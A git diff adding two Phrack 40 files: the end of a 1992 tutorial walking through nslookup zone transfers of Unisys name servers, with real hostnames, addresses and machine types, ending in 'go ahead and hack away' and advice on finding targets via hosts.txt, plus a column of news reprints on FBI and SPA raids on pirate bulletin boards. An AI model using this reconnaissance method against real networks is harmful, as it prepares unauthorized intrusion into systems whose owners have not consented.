+Default Name Server:  lycaeum.hfc.com
+Address:  66.6.66.6
+
+
+Now, going back to that NIC information we got earlier, let's continue to hack
+on poor old Unisys, which is giving up its info every step we make.  We
+determined that the kauai.mcl.unisys.com was a domain server, so let's jump
+ahead to that by changing our server to their server (after all, the computers
+we are after aren't on our machine).
+
+> server kauai.mcl.unisys.com
+Default Server:  kauai.mcl.unisys.com
+Address:  128.126.180.2
+
+Okay, now we have connected to the server.  This isn't a constant connection,
+by the way.  It will only establish a connection for the brief instant that it
+takes for it to execute commands.  It doesn't require a password or an account
+to get this information off of a nameserver.
+
+Let's start off by having it give us a list of everything about Unisys that
+this server knows.  "Everything" is pretty much a good place to start, since we
+can't go wrong.  If we come up with nothing, then that's what's available.  The
+basic command to list machines is "ls" like the Unix directory command.
+
+> ls unisys.com
+[kauai.mcl.unisys.com]
+Host of domain name            Internet address
+ unisys.com                     server = burdvax.prc.unisys.com         3600
+ burdvax.prc.unisys.com         128.126.10.33                   3600
+ unisys.com                     server = kronos.nisd.cam.unisys.com     3600
+ kronos.nisd.cam.unisys.com     128.170.2.8                     3600
+ unisys.com                     server = kauai.mcl.unisys.com           3600
+ kauai.mcl.unisys.com           128.126.180.2                   43200
+ unisys.com                     server = io.isf.unisys.com              3600
+ io.isf.unisys.com              128.126.195.20                  3600
+ reston.unisys.com              server = aviary.stars.reston.unisys.com 3600
+ aviary.star.reston.unisys.com  128.126.160.3                   3600
+ aviary.star.reston.unisys.com  128.126.162.1                   3600
+ reston.unisys.com              server = kauai.mcl.unisys.com           3600
+ kauai.mcl.unisys.com           128.126.180.2                   43200
+ rosslyn.unisys.com             server = aviary.stars.reston.unisys.com 3600
+ aviary.stars.reston.unisys.com 128.126.160.3                   3600
+ aviary.stars.reston.unisys.com 128.126.162.1                   3600
+ rosslyn.unisys.com             server = kauai.mcl.unisys.com           3600
+ kauai.mcl.unisys.com           128.126.180.2                   43200
+ rmtc.unisys.com                server = rmtcf1.rmtc.unisys.com         3600
+ rmtcf1.rmtc.unisys.com         192.60.8.3                      3600
+ rmtc.unisys.com                server = gvlv2.gvl.unisys.com           3600
+ gvlv2.gvl.unisys.com           128.126.220.102                 3600
+ sp.unisys.com                  server = dsslan.sp.unisys.com           3600
+ dsslan.sp.unisys.com           129.218.32.11                   3600
+ sp.unisys.com                  server = sys3.slc.unisys.com            3600
+ sys3.slc.unisys.com            129.221.15.85                   3600
+ cam.unisys.com                 server = kronos.nisd.cam.unisys.com     3600
+ kronos.nisd.cam.unisys.com     128.170.2.8                     3600
+ cam.unisys.com                 server = burdvax.prc.unisys.com         3600
+ burdvax.prc.unisys.com         128.126.10.33                   3600
+ prc.unisys.com                 server = burdvax.prc.unisys.com         3600
+ burdvax.prc.unisys.com         128.126.10.33                   3600
+ prc.unisys.com                 server = kronos.prc.unisys.com          3600
+ kronos.prc.unisys.com          128.170.2.8                     3600
+ prc.unisys.com                 server = walt.prc.unisys.com            3600
+ walt.prc.unisys.com            128.126.2.10                    3600
+ walt.prc.unisys.com            128.126.10.44                   3600
+ culv.unisys.com                server = formal.culv.unisys.com         3600
+ formal.culv.unisys.com         192.67.92.30                    3600
+ culv.unisys.com                server = kronos.nisd.cam.unisys.com     3600
+ kronos.nisd.cam.unisys.com     128.170.2.8                     3600
+ slc.unisys.com                 server = sys3.slc.unisys.com            3600
+ sys3.slc.unisys.com            129.221.15.85                   3600
+ slc.unisys.com                 server = dsslan.sp.unisys.com           3600
+ dsslan.sp.unisys.com           129.218.32.11                   3600
+ slc.unisys.com                 server = nemesis.slc.unisys.com         3600
+ nemesis.slc.unisys.com         128.221.8.2                     3600
+ bb.unisys.com                  server = sunnc.wwt.bb.unisys.com        3600
+ sunnc.wwt.bbs.unisys.com       192.39.41.2                     3600
+ bb.unisys.com                  server = burdvax.prc.unisys.com         3600
+ burdvax.prc.unisys.com         128.126.10.33                   3600
+ isf.unisys.com                 server = orion.ISF.unisys.com           3600
+ orion.ISF.unisys.com           128.126.195.7                   3600
+ isf.unisys.com                 128.126.195.1                   3600
+ isf.unisys.com                 server = burdvax.prc.unisys.com         3600
+ burdvax.prc.unisys.com         128.126.10.33                   3600
+ isf.unisys.com                 server = io.isf.unisys.com              3600
+ io.isf.unisys.com              128.126.195.20                  3600
+ gvl.unisys.com                 128.126.220.102                 172800
+ gvl.unisys.com                 server = gvlv2.gvl.unisys.com           3600
+ gvlv2.gvl.unisys.com           128.126.220.102                 3600
+ gvl.unisys.com                 server = burdvax.prc.unisys.com         3600
+ burdvax.prc.unisys.com         128.126.10.33                   3600
+ mcl.unisys.com                 128.126.180.2                   43200
+ mcl.unisys.com                 server = kauai.mcl.unisys.com           43200
+ kauai.mcl.unisys.com           128.126.180.2                   43200
+ mcl.unisys.com                 server = burdvax.prc.unisys.com         43200
+ burdvax.prc.unisys.com         128.126.10.33                   3600
+ mcl.unisys.com                 server = kronos.nisd.cam.unisys.com     43200
+ kronos.nisd.cam.unisys.com     (dlen = 1152?)                  4096
+ListHosts: error receiving zone transfer:
+  result: NOERROR, answers = 256, authority = 0, additional = 3.
+
+Bummer, an error.  Funny, it claims there isn't an error, yet it screwed up the
+kronos address and knocked me out.  Apparently, this domain server is screwed.
+Oh well, I guess that's really their problem because in the information it gave
+us, it was able to provide all the answers we needed to figure out the next
+step!
+
+Quick analysis of the above information shows that most of the servers were
+connected to at LEAST two other servers.  Quite impressive:  A fault-tolerant
+TCP/IP network.  Since it is fault tolerant, we can go ahead and use a
+different machine to poke into the "mcl.unisys.com" domain.  Since "mcl" stands
+for McLean, that's where we want to go.
+
+Remember that NIC told us that kauai.mcl.unisys.com had an alias?  It was also
+called "mcl.unisys.com".  Looking at the above list, we see toward the bottom
+that mcl.unisys.com is also domain served by the computers
+burdvax.prc.unisys.com and kronos.nisd.cam.unisys.com.  Let's connect to one of
+them and see what we can gather!
+
+Whenever a server starts acting screwy like kauai was doing, I make it a habit
+of using IP numbers when they are available.  I'm going to connect to
+burdvax.prc.unisys.com through its IP address of 128.126.10.33.
+
+> server 128.126.10.33
+Default server: [128.126.10.33]
+Address:  128.126.10.33
+
+Now that we are connected, let's see the network information again, but this
+time let's try something different and possibly more useful.  This time we will
+use the -h command, which happens to describe the computer type (CPU) and the
+operating system it runs on (OS) which will give us a better idea of what we
+are dealing with.
+
+> ls -h mcl.unisys.com
+Host or domain name           CPU          OS
+ maui.mcl.Unisys.COM           SUN-2/120    UNIX        43200
+ cisco.mcl.Unisys.COM          CISCO GATEWAY CISCO              43200
+ kauai.mcl.Unisys.COM          SUN-3/180    UNIX        43200
+ voyager.mcl.Unisys.COM        SUN-4/330    UNIX        43200
+ dial.mcl.Unisys.COM           SUN-3/260    UNIX        43200
+ astro.mcl.Unisys.COM          SUN-3/60     UNIX        43200
+ hotrod.mcl.Unisys.COM         Unisys 386   SCO/UNIX            43200
+ oahu.mcl.Unisys.COM           VAX-11/785   UNIX        43200
+ lanai.mcl.Unisys.COM          SUN-3/160    UNIX        43200
+ mclean_is.mcl.Unisys.COM      386          NOVELL              43200
+
+WOW!  Look at all those Suns!  I guess Unisys has no faith in their own
+computers or something!  If only President Bush could see this display of a
+company backing their product!  In fact, the only Unisys computer in this whole
+lot is a cheesy 386 clone which probably is some guy's desktop machine.
+
+Once again, there is some fascinating information here.  Let's run through it
+really quick:
+
+Maui is a Sun 2, which is a really old RISC computer.  You don't see many of
+these around but they still can be useful for storing stuff on.  But then
+again, it probably is faster than a PC!
+
+Oahu is a Vax-11 which is apparently running Ultrix.  This may be where Unisys
+hoards all their programmers since it isn't being used for serious networking
+(at least, as far as we can tell).
+
+Mclean_is happens to be the file server for a PC network.  We can't really tell
+from this point how many computers are on this network, but it could be
+possible it is used for public information trade, where secretaries or
+receptionists use it to confirm trade and scheduling.
+
+Hotrod is also a 386, made by Unisys even!  Oddly, it is running a copy of SCO
+Unix, which means it is, no doubt, a personal computer someone uses for Unix
+programming.  If Unisys were itself a part of the government, I'd think this
+computer would have been a kludged bidding contract which they got stuck with
+because they were aiming for lowest bid and were unfortunately not very picky.
+
+Voyager is an interesting machine, which is apparently the most modern on this
+network.  Since it is a Sun-4 computer (probably IPX) it would be a high-speed
+graphics workstation.  This could be the machine where many CAD applications
+are stored and worked on.  Another possibility is that Sun 4 computers were
+extremely expensive when they purchased this network of Suns, and they
+purchased this one machine to be the file server to the other Sun 3s and the
+Sun 2.  If you were to gain access to one of the other machines, it's possible
+you would have access to all of them.
+
+Cisco is just a standard Cisco Router/Gateway box, linking that particular
+network to the Internet.
+
+Kauai is a messed up domain server, big deal.  It might work on the same
+network as Astro and Lanai.
+
+Dial is a Sun-3.  Is there something in a name?  This could be the
+telecommunications dial-in for the network.  Maybe the same computer system has
+a dialout attached to it.  It might even be possible that "dial" has a guest
+account for people logging in so that they can easily connect to other
+computers on the same network (probably not).
+
+Astro and Lanai are also Sun 3 computers.  It isn't quite obvious what their
+purpose is.  Essentially, we have the impression that they were all purchased
+about the same time (explaining the large number of Sun-3 computers in this
+network) and it is quite possible they are just linked up to the Sun 4 in a
+file sharing network.  It is also possible they are older and fundamental to
+the operation of Unisys's communication platform at this particular site.
+
+There is one flaw that makes using the -h switch somewhat unreliable:
+Sometimes people realize you can do this and take the time to remove or never
+include the information about the individual machines on the network.
+Therefore, it is always best for you to do a "ls <domain>" and check everything
+out in case a computer has been removed.  Using "telnet" to connect to the
+computer is usually a foolproof method of finding out what computer it is they
+are talking about.
+
+> ls mcl.unisys.com
+[[128.126.10.33]]
+Host or domain name             Internet address
+ mcl.Unisys.COM                  server = kauai.mcl.unisys.com         3600
+ kauai.mcl.unisys.com            128.126.180.2                 3600
+ mcl.Unisys.COM                  server = burdvax.prc.unisys.com       3600
+ burdvax.prc.unisys.com          128.126.10.33                 3600
+ mcl.Unisys.COM                  server = kronos.nisd.cam.unisys.com   3600
+ kronos.nisd.cam.unisys.com      128.170.2.8                   3600
+ mcl.Unisys.COM                  128.126.180.2                 43200
+ maui.mcl.Unisys.COM             128.126.180.3                 43200
+ cisco.mcl.Unisys.COM            128.126.180.10                43200
+ kauai.mcl.Unisys.COM            128.126.180.2                 3600
+ voyager.mcl.Unisys.COM          128.126.180.37                43200
+ dial.mcl.Unisys.COM             128.126.180.36                43200
+ LOCALHOST.mcl.Unisys.COM        127.0.0.1                     43200
+ astro.mcl.Unisys.COM            128.126.180.7                 43200
+ hotrod.mcl.Unisys.COM           128.126.180.125               43200
+ oahu.mcl.Unisys.COM             128.126.180.1                 43200
+ lanai.mcl.Unisys.COM            128.126.180.6                 43200
+ mclean_is.mcl.Unisys.COM        128.126.180.9                 43200
+
+Well, running down the list, it appears that there aren't any more computers
+important to this domain that we don't know already.  LOCALHOST is just another
+way of saying connect to where you are, so that isn't a big deal.  Hotrod being
+separate from the rest of the machines seems apparent since its IP address is
+x.x.x.125, which is quite separate from the others.  Even though this doesn't
+have to be, it seems it is a wiring kludge -- probably for an office like I
+surmised.
+
+The next step?  Go ahead and hack away!  This is where all those system hacks
+people trade on the net and all those CERT Advisories become useful.  If you
+become good hacking a single machine (Suns, for example), using nslookup will
+help you identify those machines and make it easier for you to hack.
+
+Looking for annex computers, libraries, guest machines, and other such
+computers also becomes easy when you use nslookup, because the names and
+computer types are there for your convenience.  Checking on sites by selecting
+interesting "special purpose" machines with nslookup first can yield good
+results.  People have called this "netrunning," and it sounds like as good a
+name as any.
+
+Of course, the other big problem when dealing with domain servers is trying to
+identify them.  The largest list of domain servers can be found off of the
+Department of Defense Network Listing (usually called hosts.txt) which is
+available almost everywhere on the Internet through anonymous FTP.  Here is a
+rundown on how to get the file:
+
+[lycaeum][3]> ftp wuarchive.wustl.edu
+
+220 wuarchive.wustl.edu FTP server (Version 6.24 Fri May 8 07:26:32 CDT 1992)
+ready.
+Remote host connected.
+Username (wuarchive.wustl.edu:rack): anonymous
+331 Guest login ok, send your complete e-mail address as password.
+Password (wuarchive.wustl.edu:anonymous):
+230-  This is an experimental FTP server.  If your FTP client crashes or
+230-  hangs shortly after login please try using a dash (-) as the first
+230-  character of your password.  This will turn off the informational
+230-  messages that may be confusing your FTP client.
+230-
+230-  This system may be used 24 hours a day, 7 days a week.  The local
+230-  time is Wed Jun  3 20:43:23 1992.
+230-
+230-Please read the file README
+230-  it was last modified on Mon Mar  2 08:29:25 1992 - 93 days ago
+230-Please read the file README.NFS
+230-  it was last modified on Thu Feb 20 13:15:32 1992 - 104 days ago
+230 Guest login ok, access restrictions apply.
+
+ftp> get /network_info/hosts.txt
+200 PORT command successful.
+150 Opening ASCII mode data connection for /network_info/hosts.txt (1088429 bytes).
+226 Transfer complete.
+Transferred 1109255 bytes in 182.95 seconds (6063.29 bytes/sec, 5.92 KB/s).
+
+ftp> quit
+221 Goodbye.
+
+Now let's convert it to a file we can use effectively:  let's take out of that
+huge list of only the machines that are domain servers:
+
+[lycaeum][4]> grep -i domain hosts.txt > domains
+
+Okay, now that we have done that, let's prove that this is a way of finding a
+domain server without connecting to anyplace.  Let's just use the grep command
+to search the file for a server in the mcl.unisys.com domain:
+
+[lycaeum][5]> grep -i mcl.unisys.com domains
+HOST : 128.126.180.2 : KAUAI.MCL.UNISYS.COM,MCL.UNISYS.COM : SUN-3/180 :
+SUNOS : TCP/TELNET,TCP/FTP,TCP/SMTP,UDP/DOMAIN :
+[lycaeum][6]>
+
+And there you have another way.  Everything we looked at is here: IP number,
+the name, the "alias," the computer type, the operating system, and a brief
+list of network protocols it supports, including the domain server attribute.
+However, none of the other machines on the mcl.unisys.com network were
+displayed.  The DoD isn't a complete list of network machines, only the network
+machines that are vital to the functioning of the Internet (in the last year,
+this list has grown from about 350K to 1.1 megabytes -- and this only reflects
+the "new" networks, not including the addition of new machines onto old
+networks; the Internet is definitely "in;"  I believe it was estimated 25%
+growth per month!).
+
+Obviously, this is very effective when going after university sites.  It seems
+they have too many machines to take good care of security on.  Essentially, the
+DoD list contains much the same information as NIC does, and is about a million
+times more discreet.  I'm not sure if NIC is fully logged, but it does have a
+staff Head of Security (*snicker*).
+
+Well, that will pretty much wrap it up for this file.  Hope some of it was
+useful for you.
diff --git a/phrack40/5.txt b/phrack40/5.txt
new file mode 100644
index 0000000..85e2901
--- /dev/null
+++ b/phrack40/5.txt
@@ -0,0 +1,869 @@
+                                ==Phrack Inc.==
+
+                     Volume Four, Issue Forty, File 5 of 14
+
+                                  Pirates Cove
+
+                                   By Rambone
+
+
+Welcome back to Pirates Cove.  My apologies for not providing you with this
+column in Phrack 39.  However, in this issue we take a look at some recent
+busts of pirate boards and the organization most to blame for it all... the
+Software Publishers Association.  Plus we have news and information about
+Vision-X, game reviews, BAD Magazine, and more.  Enjoy.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ FBI Raids Computer Pirate; SPA Follows With Civil Lawsuit        June 11, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+BOSTON -- The Federal Bureau of Investigation raided [on June 10] "Davy Jones
+Locker," a computer bulletin board located in Millbury, Massachusetts, which
+has allegedly been illegally distributing copyrighted software programs.
+
+The Davy Jones bulletin board was a sophisticated computer bulletin board with
+paying subscribers in 36 states and 11 foreign countries.
+
+A computer bulletin board allows personal computer users to access a host
+computer by a modem-equipped telephone to exchange information including
+messages, files, and computer programs.  The system operator (or sysop) is
+generally responsible for materials posted to the bulletin board.
+
+For a fee of $49 for three months or $99 for one year, subscribers to Davy
+Jones Locker were given access to a special section of the bulletin board that
+contained copies of more than 200 copyrighted programs including popular
+business and entertainment packages.  Subscribers could "download" or receive
+these programs for use on their own computers without having to pay the
+copyright owner anything for them.
+
+The business programs offered were from a variety of well-known software
+companies, including:  AutoDesk, Borland International, Broderbund, Central
+Point System, Clarion Software, Fifth Generation, Fox Software, IBM, Intuit,
+Lotus Development, Micrografx, Microsoft, Software Publishing Corp., Symantec,
+Ventura Software, WordPerfect and X-Tree Co.  Entertainment programs included
+Flight Simulator by Microsoft, and Leisure Suit Larry by Sierra.
+
+Seized in the raid on Davy Jones Locker were computers, telecommunications
+equipment, as well as financial and other records.
+
+"The SPA applauds the FBI's action today," said Ilene Rosenthal, director of
+litigation for the Software Publishers Association (SPA).  "This is one of the
+first instances that we are aware of where the FBI has shut down a pirate
+bulletin board for distributing copyrighted software.  It clearly demonstrates
+a trend that the government is recognizing the seriousness of software
+copyright violation.  It is also significant that this week the Senate passed
+S.893, a bill that would make the illegal distribution of copyrighted software
+a felony."
+
+For the past four months, the Software Publishers Association has been
+investigating the Davy Jones Locker bulletin board and had downloaded business
+and entertainment programs from the board.  The programs obtained from Davy
+Jones Locker were then cross-checked against the original copyrighted
+materials.  In all cases, they were found to be identical.
+
+Subscribers to Davy Jones Locker not only downloaded copyrighted software, but
+were also encouraged to contribute additional copyrighted programs to the
+bulletin board.
+
+The system operator limited subscribers to four hours on the bulletin board
+each day.  He also limited the amount of software a subscriber could download
+to his or her own computer each day.  Those who "uploaded" or transmitted new
+copyrighted software to the bulletin board for further illegal distribution
+were rewarded with credits good for additional on-line time or for additional
+software.
+
+"Imagine a video store that charges you a membership fee and then lets you
+make illegal duplicates of copyrighted movies onto blank video tapes,"
+explains Ilene Rosenthal, SPA director of litigation.  "But it limits the
+number of movies you can copy unless you bring in new inventory -- copies of
+new movies not already on the shelves.  That was the deal at Davy Jones
+Locker."
+
+Davy Jones Locker was an international concern with paid subscribers in the
+United States and 11 foreign countries including Australia, Canada, Croatia,
+France, Germany, Iraq, Israel, Netherlands, Spain, Sweden and the United
+Kingdom.
+
+Whether it's copied from a program purchased at a neighborhood computer store
+or downloaded from a bulletin board thousands of miles away, pirated software
+adds to the cost of computing.  According to SPA, software pirates throughout
+the world steal between $10 and $12 billion of copyrighted software each year.
+
+"Many people may not realize that software prices are higher, in part, to make
+up for losses to the pirates," says Ken Wasch, executive director of the SPA.
+"Pirate bulletin boards not only distribute business software, but also hurt
+the computer game publishers by distributing so many of their programs
+illegally.  In addition they ruin the reputation of the hundreds of legitimate
+bulletin boards which serve an important function to computer users."
+
+The Software Publishers Association is the principal trade association of the
+personal computer software industry.  Its 900 members represent the leading
+publishers in the business, consumer and education software markets.  The SPA
+has offices in Washington, D.C., and Paris La Defense, France.
+
+CONTACT:  Software Publishers Association, Washington, D.C.
+          Terri Childs or Ilene Rosenthal, 202/452-1600
+_______________________________________________________________________________
+
+ PC Bulletin Board Hit by FBI Raid                                June 14, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Josh Hyatt (Boston Globe)(Chicago Tribune, Section 7, Page 3)
+
+BOSTON -- In one of the first reported crackdowns of its kind, six FBI agents
+raided a computer bulletin board based in a Millbury, Massachusetts, home last
+week.  Authorities said the bulletin board's operator had been illegally
+distributing copyrighted software.
+
+Executing a criminal search warrant, the agents seized several computers, six
+modems and a program called PC Board, which was used to run the bulletin board.
+Authorities also seized documents that listed users of the service.
+
+No arrests were made, according to the Software Publisher's Association, a
+trade group that brought the case to the FBI's attention.  The association
+estimates that, as of March, the bulletin board had distributed $675,000 worth
+of copyrighted software; software pirates, it says, annually steal as much as
+$12 billion this way.
+
+The FBI will not comment on the case except to confirm that a raid had taken
+place and that the investigation is continuing.  The alleged operator of the
+bulletin board, Richard Kenadek, could not be reached for comment.
+
+Around the same time as the raid, the software association filed a civil
+lawsuit against Kenadek, charging him with violating copyright laws.  Ilene
+Rosenthal, the group's director of litigation, said that "the man had
+incriminated himself" through various computerized messages.
+
+"There's plenty of evidence to show that he was very aware of everything on his
+bulletin board," she said.
+
+Bulletin boards let personal computer users access a host computer via modems.
+Typically, participants exchange information regarding everything from computer
+programs to tropical fish.  They may also, for example, obtain upgrades of
+computer programs.
+
+The association said its own four-month investigation revealed that this
+bulletin board, called Davy Jones Locker, contained copies of more than 200
+copyrighted programs.
+
+Rosenthal said users also were encouraged to contribute copyrighted software
+programs for others to download or copy.
+
+According to Rosenthal, subscribers paid a fee, $49 for three months or $99 for
+one year. She said Davy Jones Locker had nearly 400 paying subscribers in 36
+states and 11 foreign countries.
+_______________________________________________________________________________
+
+ Cracking Down On Computer Counterfeiters                             July 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By B.A. Nilsson (PC-Computing Magazine)(Page 188)
+
+Popular bonding rituals usually aren't criminal.  Admire a friend's new car,
+and you're likely to swap a few stories and a can of STP.  You may be invited
+to take the car for a spin.  You can pass recipes back and forth or lend your
+copy of the latest best-seller to a fellow fan.
+
+Sharing computer programs is another common practice among friends.  It's
+great to help someone who's daunted by the challenge of learning to use a new
+machine, and sometimes that includes a gift of some of your favorite software.
+"Here.  Why don't you get started with WordPerfect?"  And, later, inevitably,
+"The Norton Utilities will get that file back for you."
+
+Copying a set of disks is so simple and such a private action that you'd hardly
+think it's also illegal.  The legality part is easy to overlook.  The copyright
+notice is a complicated critter, often printed on the seal of the software
+package that is torn away as you dig for those floppy disks.  You may not even
+be the one who ripped the original package open (in which case, you're yet
+another who's ripped the program off).
+
+But whether or not you're aware of it, unless you either broke the shrink-wrap
+or received the package with all disks, documentation, and licensing
+information intact, you're breaking the law.  The good news is that if you're
+an individual with pirated software on your home computer, you probably won't
+get caught.  But if you're a boss with an angry employee, the Software
+Publishers Association (SPA) may get tipped off.  When the SPA comes to call on
+your business, it's with U.S. marshals and lots of official paperwork.  And the
+association has an annoyingly good history of winning its copyright-
+infringement cases.
+
+Perspectives on Piracy
+
+"Computers give us a kind of technical sophistication that never used to
+exist," says Ken Wasch, the voluble head of the SPA.  "In the old days, if you
+wanted to make your own copy of something like a pencil, you'd need a
+complicated manufacturing center.  But the very fact that you can run a
+computer program means that you can make a flawless copy of it.  This is the
+only industry in the world that empowers every customer to be a manufacturing
+subsidiary."
+
+The regulations are spelled out again and again in the software manuals:
+You're allowed to make one or two copies of the program for backup purposes.
+Other rules vary slightly from company to company.  Some license agreements
+demand that the software package be used only with a single machine; others,
+most notably Borland's, let you use the program on as many computers as you
+wish, provided no two copies of the program are run concurrently, just as a
+book can be read by only one person at a time.
+
+"If all software developers took the same approach as Borland International,
+people wouldn't steal so much," says avowed pirate Ed Teach.
+
+(Note:  The names and locations of all interviewed pirates have been changed.)
+
+"Borland gives you that book license.  Of course, they'll drive you insane with
+upgrades.  They wholesale the software, then make their money on all the
+subsequent releases."
+
+Teach is the systems administrator for a residential health-care company in
+the Southeast.  "I believe in piracy," he says.  "I like to borrow something to
+play with it.  If I like it, I'll buy it."
+
+He dismisses demos and limited versions of programs as inadequate for the
+testing he prefers; similarly, he considers the typical 30-day return agreement
+too restrictive.  "It's not a realistic time period for an evaluation," Teach
+says.  "I just got a copy of FormTool Pro, and it's a powerful program with a
+very steep learning curve.  I can't devote myself to it and learn what I'd need
+to know in 30 days."
+
+Teach has spent six years recommending and configuring programs for his
+company.  He does not fit the image of a lawbreaker, and he believes that what
+he does is morally justified.  "I buy the software eventually.  My company
+bought licenses to use WordPerfect 5.1 after starting with a pirated copy of
+the program.  Everything on the company machines is legit."
+
+Copying wasn't always so easy.  Old-timers remember the copy-protection schemes
+that pervaded the computer industry, requiring key disks or special
+initialization procedures.  But users unanimously demanded an end to it, and
+when Lotus, the last significant holdout, gave in, that era was over.  Today
+you find protection only on games and niche-market programs.
+
+How much has the end of copy protection cost software companies?  It's
+impossible to figure accurately.  In August 1991, the indefatigable Software
+Publishers Association released figures on corporate-use losses that suggest
+both a staggering financial loss and a possible decline in piracy.  In 1987,
+1.31 DOS-based software programs were sold for every office computer.  The
+expected proportion is three packages per computer, meaning that more than half
+of the programs in use were probably pirated.  In 1990, the number of
+legitimate packages jumped to 1.78.  But prices have gone up, too, so that the
+dollar losses haven't changed much:  The 1987 liability was $2.3 billion, and
+the number rose to $2.4 billion in 1990.
+
+The numbers for private-use piracy, on the other hand, can't be calculated.  If
+all the computer users who have never pirated software got together, they
+wouldn't need a very large hall.  Wasch concedes that it's difficult to
+actually catch and prosecute the individual pirate.  "Nobody is actually doing
+time for piracy," he says, citing the exception of a retailer who was caught
+running what amounted to a pirated-software storefront.
+
+   The Software Police
+
+Although the SPA is targeting home abuse in a current study, Wasch believes
+that the greatest financial losses are due to corporate piracy.  And corporate
+pirates are easier to apprehend because an angry employee is frequently willing
+to turn in the boss.  "We get about 20 calls a day," says Wasch, who set up a
+special number (800-388-7478) for reporting piracy.  "Ninety percent of the
+calls we follow up on come from disgruntled employees."
+
+It's the kind of visit most of us have only seen in the movies, and it's
+usually an unexpected one.  A receptionist with one targeted company was so
+shocked by the arrival of the SPA posse that she asked if it was a "Candid
+Camera" stunt.
+
+Founded in 1984 as an educational and promotional group, the SPA evolved into
+a software police force five years ago as more and more software vendors
+joined.  Now almost 800 are in the fold.  The SPA began to woo whistle-blowers
+in earnest about two years ago, after a tip led to the successful bust of a
+large corporation in the Midwest.
+
+"Business is too good," Wasch says.  "We're doing far more lawsuits and far
+more audits than ever before, and the numbers are continuing to grow."
+
+If your corporation is busted by the SPA, hope that it's done by mail.  "What
+happens then is that we write the CEO a letter explaining that we want to do an
+audit," Wasch says.  "If we find illegal software, the company pays twice: Once
+for the pirated copy, once for a new one.
+
+"That's a lot better for the company.  The fine is much lower, and they don't
+face the adverse publicity that results from a lawsuit.  Still, 60 percent of
+them promise they won't destroy software before they report it, and then they
+go and do it anyway."
+
+That was the case with a recent SPA visit to a medium-size defense contractor
+in Washington, DC.  "They agreed to an audit, and then they tried to wipe
+pirated programs off all the hard disks," Wasch says.  "But we knew.  Why do
+they think we called them in the first place?  Someone on the inside was
+talking.  I couldn't believe they'd sit there and lie to us about it, we had
+them over a barrel!"
+
+The increasingly ominous specter of the SPA breaking down the door is making
+more companies go legit, but some continue to spout excuses.  "I don't want to
+break the law, but I also don't want to go out of business," says Howell Davis,
+the CEO of an accounting firm in a New England capital.  "We can't afford to
+work without computers, but I can't pay the high price of registering every
+copy of every program we use.  I had to borrow a lot of money to get this
+business off the ground, and I think of this as just another form of borrowing.
+It's another loan I'll repay when I can afford to."
+
+Some corporate pirates operate with a sense of entitlement.
+
+"Nobody's going to catch us," says Charles Vane, the managing director of a
+nonprofit theater company in the Northwest, "and nobody should even be trying
+to.  We're on the brink of bankruptcy.  Companies should be giving us software
+packages as a gesture of support for the arts."  He admits that almost all of
+the software his theater uses is pirated.  "We have some nice programs,
+including an accounting package developed for Ernst & Young that we swiped and
+a copy of SuperCalc with a bunch of extra modules.  And WordPerfect, of
+course," Vane says.
+
+Where do the packages originate?  "Our board members get them for us," Vane
+says.  "Of course, that means we can't be choosy.  We have to wait until a
+particular program comes our way.  And what they like to give us the most are
+games.  We have a kazillion games."
+
+Games and piracy are natural partners.  Games themselves encourage piracy.
+Unlike business-oriented programs, they engender intense, short-lived
+relationships.  Or as pirate-BBS operator John Rackam puts it, "Games get
+boring.  That's why you see so many of them on the pirate boards."
+
+Online Piracy
+
+Rackam runs a BBS straight out of "The Man from U.N.C.L.E."  It looks like any
+other medium-size board in the country, with a standard collection of shareware
+and message bases.  Gain special access which only takes $50 and a friend's
+recommendation and you pass through the secret door into a 600MB collection of
+the latest applications, including 10 zipped files of the complete dBASE IV, 11
+of AutoCAD, and 6 of MS-DOS 5.0.
+
+"Most of the people who use my board are collectors," he says.  "They have to
+have the latest copy of everything."  Rackam isn't deterred by the threat of
+getting caught.  "I don't think it's going to happen to me.  I'm not doing
+anything that's really terrible.  I mean, I'm not hacking up bodies or
+anything.  I make no money off this.  The fee is just for keeping up my
+equipment.  I consider myself a librarian."
+
+Novell takes a dim view of that attitude, as evidenced by an August 1991 raid
+of two California bulletin board systems accused of distributing Novell NetWare
+files.  Such systems are another target the SPA would like to hit, and Wasch is
+looking for FBI cooperation.
+
+That makes the Humble Guys Network ripe for the picking.  Study the high-
+resolution GIF file of these buccaneers, and you see a collection of ordinary-
+looking folks who happen to traffic in pirated game software.  The founder, a
+hacker who called himself Candy Man, has since skipped the country; now The
+Slave Lord, a student at a southern college, is at the helm.
+
+"The whole point of the network is to get games before the stores have them,"
+says Bill Kidd, a computer consultant in Manhattan.  "This is like proof of
+manhood, how fast you can get them."  Kidd professes little personal
+involvement with piracy, but he knows where the bodies are buried.
+
+"First there are the suppliers who can get a program from a manufacturer well
+before it's released," Kidd says.  "Often the supplier works for the
+manufacturer.  The game goes to the head person, who delivers it to the
+crackers.  They're the ones who remove the copy protection.  From there it goes
+to the couriers, and each has a list of pirate BBS's.  The program then makes
+it all over the country in minutes."
+
+Speed is an obsession.  These pirates are armed with 9,600-bit-per-second
+modems and a must-have-it-now mentality.  "The week before MS-DOS 5.0 hit the
+stores," says Kidd, "most of the pirate boards had already deleted it because
+they had been offering beta versions six months before."
+
+As far as revenues are concerned, pirate bulletin boards may be more of a
+nuisance than a threat.  "Those people are never really going to buy that
+software," says John Richards, a product manager with Lotus.  "Nominally, it's
+bad, but it's not as if they're buying one copy of 1-2-3 to put on the office
+workstation for ten users."
+
+Pirates at Home
+
+While an office environment allows for regular, rigorous audits, the home
+user gets away with pirating software.  Peer under the hoods of a few hard
+disks, and you're liable to find something illicit.
+
+"It can happen innocently enough," says Symantec's Rod Turner.  As general
+manager of the Peter Norton Group, Turner has the distinction of overseeing one
+of the most frequently pirated pieces of software:  The Norton Utilities.
+"Someone puts a copy of the software on someone else's machine to test it out
+and leaves it behind.  The other user assumes it's there legitimately," Turner
+says.
+
+"Often, someone gets software from a friend who got it at work," says Tony
+Geer, service manager at Computer Directions, a retail outlet in Albany, New
+York.  Geer looks at hundreds of user-configured hard disks every month.
+"Someone buys a machine from us, then turns around and calls us to say that
+he's got all this software now, could we tell him how to run it," Geer says.
+"What am I supposed to do?  The customer wants me to spend hours on the phone
+teaching him or he gets mad.  When I tell him he has to buy the program, too,
